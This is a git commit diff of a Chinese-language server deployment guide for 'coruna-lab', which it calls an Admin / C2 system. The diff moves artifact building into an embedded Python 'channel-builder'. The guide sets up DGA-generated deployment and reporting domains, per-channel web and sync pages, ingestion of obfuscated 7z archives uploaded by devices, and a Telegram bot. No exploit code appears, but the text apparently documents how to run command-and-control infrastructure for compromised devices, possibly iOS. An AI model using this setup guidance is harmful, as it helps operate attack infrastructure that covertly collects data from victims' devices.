fix: ios 16
This commit is contained in:
+56
-119
@@ -1,38 +1,33 @@
|
||||
# 宝塔部署指南(coruna-lab + coruna-lab-web)
|
||||
# 宝塔部署指南(coruna-lab + channel-builder)
|
||||
|
||||
同机部署、职责分离。构建 API 仅本机访问;Admin / C2 与静态产物站对外。
|
||||
|
||||
兄弟项目构建细节另见 `[../../coruna-lab-web/docs/BUILD_API.md](../../coruna-lab-web/docs/BUILD_API.md)`。
|
||||
同机部署:Laravel 内嵌 `channel-builder` 直接构建产物;Admin / C2 与静态产物站对外。**不再需要**独立 Build API / 8081。
|
||||
|
||||
## 架构
|
||||
|
||||
|
||||
| 角色 | 项目 / 路径 | 对外 | 进程 |
|
||||
| ---------- | -------------------------- | ---------------------------- | ----------------- |
|
||||
| C2 / Admin | `coruna-lab` | `https://admin.example.com` | Nginx + PHP-FPM |
|
||||
| 静态产物站 | `coruna-lab-web/artifacts` | `https://static.example.com` | Nginx 只读静态 |
|
||||
| Build API | `coruna-lab-web` | **仅本机** `127.0.0.1:8081` | Supervisor / 进程守护 |
|
||||
| 角色 | 项目 / 路径 | 对外 | 进程 |
|
||||
| ---------- | ------------------------------- | --------------------------- | --------------- |
|
||||
| C2 / Admin / 静态 | `coruna-lab`(`public/`) | `https://admin.example.com` | Nginx + PHP-FPM |
|
||||
| 构建工具 | `coruna-lab/channel-builder` | 无(PHP Process 调用) | Python venv |
|
||||
|
||||
|
||||
```text
|
||||
设备 / 运营
|
||||
│
|
||||
├─ Admin / C2 API ──► coruna-lab (Laravel)
|
||||
├─ Admin / C2 /web /sync ──► coruna-lab/public (Laravel)
|
||||
│ │
|
||||
│ └─ HTTP Bearer ──► 127.0.0.1:8081 (build_api)
|
||||
│ │
|
||||
│ ▼
|
||||
└─ /channel/<id>/web|sync ──► static 站点 ──► artifacts/
|
||||
│ └─ Process ──► channel-builder → public/web|sync
|
||||
│ └─ state → storage/app/channel-builder
|
||||
└─ DGA 域名反代到同一 public/
|
||||
```
|
||||
|
||||
建议目录:
|
||||
|
||||
```text
|
||||
/www/wwwroot/coruna-lab/
|
||||
/www/wwwroot/coruna-lab-web/
|
||||
```
|
||||
|
||||
防火墙只放行 80/443;**不要**把 `8081` 暴露到公网。
|
||||
防火墙只放行 80/443。
|
||||
|
||||
---
|
||||
|
||||
@@ -78,7 +73,7 @@ max_input_time = 600
|
||||
```
|
||||
|
||||
- `post_max_size` ≥ `upload_max_filesize`
|
||||
- Admin 触发构建会同步等待 lab-web,超时与 `.env` 中 `CORUNA_BUILD_SERVICE_TIMEOUT` 对齐(建议 ≥ 600)
|
||||
- Admin 触发构建会同步等待 Python 脚本,超时与 `.env` 中 `CORUNA_CHANNEL_BUILDER_TIMEOUT` 对齐(建议 ≥ 600)
|
||||
- CLI 查 `max_execution_time` 常为 `0`(不限制),属正常;以浏览器/`phpinfo()` 的 FPM 值为准
|
||||
|
||||
Nginx 站点配置建议同时加大:
|
||||
@@ -93,110 +88,51 @@ client_max_body_size 64m;
|
||||
|
||||
|
||||
|
||||
## 1. 部署 coruna-lab-web(先部署)
|
||||
## 1. 部署 channel-builder(随 coruna-lab)
|
||||
|
||||
|
||||
|
||||
### 1.1 代码与依赖
|
||||
|
||||
```bash
|
||||
cd /www/wwwroot/coruna-lab-web
|
||||
cd /www/wwwroot/coruna-lab/channel-builder
|
||||
|
||||
python3 -m venv .venv
|
||||
source .venv/bin/activate
|
||||
pip install -r requirements.txt
|
||||
pip install -r frontend/tools/requirements.txt
|
||||
|
||||
mkdir -p artifacts
|
||||
chown -R www:www artifacts # 按面板运行用户调整
|
||||
# PHP-FPM 用户需能执行 .venv/bin/python,并写 public/ 与 storage/app/channel-builder/
|
||||
chown -R www:www /www/wwwroot/coruna-lab/public /www/wwwroot/coruna-lab/storage
|
||||
```
|
||||
|
||||
|
||||
|
||||
### 1.2 `.env`
|
||||
### 1.2 静态路径(写在 Admin 站点 public/)
|
||||
|
||||
```bash
|
||||
cp .env.example .env
|
||||
python3 -c 'import secrets; print(secrets.token_urlsafe(48))' # 生成 token
|
||||
产物默认落在 **Laravel `public/`**,与 Admin 同站即可,无需单独静态站点:
|
||||
|
||||
```text
|
||||
https://admin.example.com/web/<id>/support.html
|
||||
https://admin.example.com/sync/daily.html
|
||||
```
|
||||
|
||||
示例:
|
||||
|
||||
```dotenv
|
||||
BUILD_API_TOKEN=用长随机串替换
|
||||
BUILD_API_ARTIFACT_ROOT=/www/wwwroot/coruna-lab-web/artifacts
|
||||
BUILD_API_PROJECT_SCRIPT=/www/wwwroot/coruna-lab-web/frontend/tools/new_project.py
|
||||
BUILD_API_PYTHON=/www/wwwroot/coruna-lab-web/.venv/bin/python
|
||||
BUILD_API_HOST=127.0.0.1
|
||||
BUILD_API_PORT=8081
|
||||
BUILD_API_TIMEOUT=900
|
||||
```
|
||||
|
||||
|
||||
|
||||
### 1.3 进程守护
|
||||
|
||||
宝塔 → Supervisor / 进程守护管理器:
|
||||
|
||||
|
||||
| 项 | 值 |
|
||||
| ---- | ----------------------------------------------------------- |
|
||||
| 名称 | `coruna-build-api` |
|
||||
| 启动用户 | `www` |
|
||||
| 运行目录 | `/www/wwwroot/coruna-lab-web` |
|
||||
| 启动命令 | `/www/wwwroot/coruna-lab-web/.venv/bin/python -m build_api` |
|
||||
|
||||
|
||||
验证:
|
||||
|
||||
```bash
|
||||
curl -s http://127.0.0.1:8081/health
|
||||
```
|
||||
|
||||
|
||||
|
||||
### 1.4 静态站(只暴露 web / sync)
|
||||
|
||||
新建站点(如 `static.example.com`):
|
||||
|
||||
- 根目录:`/www/wwwroot/coruna-lab-web/artifacts`
|
||||
- 关闭 PHP
|
||||
- SSL 按需开启
|
||||
|
||||
配置示例(正则含 `{32}` 时**必须加引号**,否则 Nginx 会把 `{` 当配置块):
|
||||
在 Admin 站点 Nginx 中优先静态命中(放在 `location /` 的 `try_files … /index.php` **之前**):
|
||||
|
||||
```nginx
|
||||
server {
|
||||
listen 80;
|
||||
listen 443 ssl http2;
|
||||
server_name static.example.com;
|
||||
root /www/wwwroot/coruna-lab-web/artifacts;
|
||||
location ~ "^/web/[0-9a-f]{32}/" {
|
||||
try_files $uri =404;
|
||||
add_header Cache-Control "public, max-age=300";
|
||||
}
|
||||
|
||||
location ~ "^/channel/[0-9a-f]{32}/(web|sync)/" {
|
||||
try_files $uri =404;
|
||||
add_header Cache-Control "public, max-age=300";
|
||||
}
|
||||
|
||||
location / {
|
||||
return 404;
|
||||
}
|
||||
location /sync/ {
|
||||
try_files $uri =404;
|
||||
add_header Cache-Control "public, max-age=60";
|
||||
}
|
||||
```
|
||||
|
||||
改完:
|
||||
`lab_seeds.json` / `out/` 在 `storage/app/channel-builder/`,不在 web 根。
|
||||
|
||||
```bash
|
||||
nginx -t && nginx -s reload
|
||||
```
|
||||
|
||||
公开 URL:
|
||||
|
||||
```text
|
||||
https://static.example.com/channel/<id>/web/support.html
|
||||
https://static.example.com/channel/<id>/sync/daily.html
|
||||
```
|
||||
|
||||
`staging/`、`locks/`、`manifest.json`、`out/` 等不得对外。
|
||||
**首次创建渠道后**,用返回的 DGA `domains.deployment` / `domains.reporting` 注册域名,反代到同一 `public/`(reporting → C2)。
|
||||
|
||||
---
|
||||
|
||||
@@ -281,17 +217,18 @@ SESSION_DOMAIN=null
|
||||
SESSION_SECURE_COOKIE=true
|
||||
SESSION_SAME_SITE=lax
|
||||
|
||||
# 同机 Build API(token 与 lab-web BUILD_API_TOKEN 一致)
|
||||
CORUNA_BUILD_SERVICE_URL=http://127.0.0.1:8081
|
||||
CORUNA_BUILD_SERVICE_TOKEN=与 BUILD_API_TOKEN 相同
|
||||
CORUNA_BUILD_SERVICE_CONNECT_TIMEOUT=5
|
||||
CORUNA_BUILD_SERVICE_TIMEOUT=600
|
||||
# 内嵌 channel-builder(无 Build API;产物默认 public/)
|
||||
CORUNA_CHANNEL_BUILDER_PYTHON=/www/wwwroot/coruna-lab/channel-builder/.venv/bin/python
|
||||
# CORUNA_ARTIFACT_ROOT=/www/wwwroot/coruna-lab/public
|
||||
# CORUNA_CHANNEL_STATE_ROOT=/www/wwwroot/coruna-lab/storage/app/channel-builder
|
||||
CORUNA_CHANNEL_BUILDER_TIMEOUT=600
|
||||
|
||||
CORUNA_STATIC_SITE_BASE_URL=https://static.example.com
|
||||
CORUNA_STATIC_SITE_BASE_URL=https://admin.example.com
|
||||
CORUNA_STATIC_SITE_SCHEME=https
|
||||
|
||||
CORUNA_LAB_CHANNEL_DOMAINS=www.dep1.example,www.dep2.example
|
||||
CORUNA_REPORTING_DOMAINS=www.rep1.example,www.rep2.example
|
||||
# 可选:后台链接展示用(不驱动二进制补丁;DGA 域名以首次构建返回为准)
|
||||
CORUNA_LAB_CHANNEL_DOMAINS=
|
||||
CORUNA_REPORTING_DOMAINS=
|
||||
|
||||
# C2 上报 7z 解包(与 build_api 无关,仍需配置)
|
||||
CORUNA_7Z_BIN=/www/wwwroot/coruna-lab/bin/7z
|
||||
@@ -321,7 +258,7 @@ chmod -R ug+rwx storage/framework/sessions
|
||||
|
||||
### 2.5 p7zip(C2 入库)
|
||||
|
||||
`CORUNA_7Z_BIN` **仍需要**:设备 multipart 上报的混淆 7z 由 Laravel `CorunaArchive` 解压,与渠道构建拆到 lab-web 无关。
|
||||
`CORUNA_7Z_BIN` **仍需要**:设备 multipart 上报的混淆 7z 由 Laravel `CorunaArchive` 解压,与 channel-builder 无关。
|
||||
|
||||
Debian / Ubuntu(宝塔常见):
|
||||
|
||||
@@ -413,11 +350,11 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
|
||||
|
||||
## 3. 联调检查清单
|
||||
|
||||
1. `curl -s http://127.0.0.1:8081/health` 正常
|
||||
1. `channel-builder/.venv/bin/python -c 'import Crypto, py7zr; print("ok")'` 正常
|
||||
2. Admin 登录 `https://admin.example.com/admin/login`
|
||||
3. 后台新建渠道 → 构建成功(lab-web 进程日志无报错)
|
||||
4. 打开静态站 support / daily 页
|
||||
5. `manifest.json`、`/staging/` 等返回 404
|
||||
3. 后台新建渠道 → 构建成功;响应含 `seeds` / `domains`(首次)
|
||||
4. 打开静态站 `/web/<id>/support.html` 与 `/sync/daily.html`
|
||||
5. `/web/<id>/support.html` 与 `/sync/daily.html` 可直接访问;seed 在 storage 不暴露
|
||||
6. C2 上报与 7z 入库正常
|
||||
7. `telegram:set-webhook` 成功;Bot 能收到指令
|
||||
|
||||
@@ -430,10 +367,10 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
|
||||
|
||||
| 动作 | 命令 / 操作 |
|
||||
| ---------- | --------------------------------------------------------------- |
|
||||
| 更新 lab-web | 拉代码 → `pip install -r ...` → 重启 Supervisor 进程 |
|
||||
| 更新 lab | 拉代码 → `composer install` → `artisan migrate` → `config:cache` 等 |
|
||||
| 备份 | MySQL + `artifacts/` |
|
||||
| 构建超时 | 同时加大 `BUILD_API_TIMEOUT` 与 `CORUNA_BUILD_SERVICE_TIMEOUT` |
|
||||
| 更新 builder | 拉代码 → `channel-builder/.venv` 内 `pip install -r requirements.txt` |
|
||||
| 更新 lab | 拉代码 → `composer install` → `artisan migrate` → `config:cache` 等 |
|
||||
| 备份 | MySQL + `public/web` + `public/sync` + `storage/app/channel-builder` |
|
||||
| 构建超时 | 加大 `CORUNA_CHANNEL_BUILDER_TIMEOUT` 与 PHP `max_execution_time` |
|
||||
|
||||
|
||||
当前 `QUEUE_CONNECTION=sync`,一般无需单独 queue worker。
|
||||
@@ -483,7 +420,7 @@ PHP「禁用函数」含 `putenv`。在 PHP 8.2 设置里移除后重试。
|
||||
location 正则未加引号,`{32}` 被当成配置块。改为:
|
||||
|
||||
```nginx
|
||||
location ~ "^/channel/[0-9a-f]{32}/(web|sync)/" {
|
||||
location ~ "^/web/[0-9a-f]{32}/" {
|
||||
```
|
||||
|
||||
|
||||
@@ -541,10 +478,10 @@ chmod -R ug+rwx storage/framework/sessions
|
||||
|
||||
## 6. 分机部署(可选)
|
||||
|
||||
lab 与 lab-web 不同机时:
|
||||
若要把 `/web` `/sync` 拆到另一台纯静态机:
|
||||
|
||||
- lab-web 内网 Nginx 反代 `127.0.0.1:8081`,仅放行 lab 机器 IP
|
||||
- Laravel:`CORUNA_BUILD_SERVICE_URL=https://builds.internal.example`
|
||||
- 静态站仍指向 lab-web 的 `artifacts`
|
||||
- 构建后 rsync `public/web` + `public/sync` 到静态机文档根
|
||||
- 或把 `CORUNA_ARTIFACT_ROOT` 指到共享盘,静态机 Nginx root 指向该盘
|
||||
- seed 状态仍放在 lab 的 `CORUNA_CHANNEL_STATE_ROOT`
|
||||
|
||||
同机部署时不必单独建公网 builds 站点。
|
||||
同机时无需拆分,Admin `public/` 即静态根。
|
||||
Reference in New Issue
Block a user